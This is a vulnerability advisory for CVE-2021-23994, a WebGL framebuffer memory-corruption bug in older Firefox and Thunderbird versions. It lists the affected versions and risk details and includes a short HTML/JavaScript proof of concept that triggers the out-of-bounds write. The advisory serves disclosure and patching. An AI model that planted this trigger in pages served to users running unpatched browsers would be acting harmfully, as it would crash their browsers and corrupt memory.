CVE-2021-23994
HIGH Severity
A WebGL framebuffer was not initialized early enough, resulting in memory corruption and an out of bound write. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88.
Proof of Concept
<!DOCTYPE html>
<body>
<canvas id="canvas3" width="1024" height="1024"></canvas>
<script>
var canvas = document.getElementById('canvas3');
var gl3 = canvas3.getContext('webgl2', { alpha:false, antialias:false } );
var fBuffer3 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.DRAW_FRAMEBUFFER, fBuffer3);
var fBuffer4 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.READ_FRAMEBUFFER, fBuffer4);
var rBuffer3 = gl3.createRenderbuffer();
gl3.bindRenderbuffer( gl3.RENDERBUFFER, rBuffer3 );
gl3.framebufferRenderbuffer( gl3.READ_FRAMEBUFFER, gl3.COLOR_ATTACHMENT0, gl3.RENDERBUFFER, rBuffer3 );
gl3.deleteFramebuffer(fBuffer4);
gl3.drawBuffers([gl3.COLOR_ATTACHMENT0]);
</script>
</body>
</html>
Risk Information
CVE ID
CVE-2021-23994
Vendor
Mozilla
Product
Firefox
CVSS SCORE
8.8
Advisories
Vendor Advisory
NVD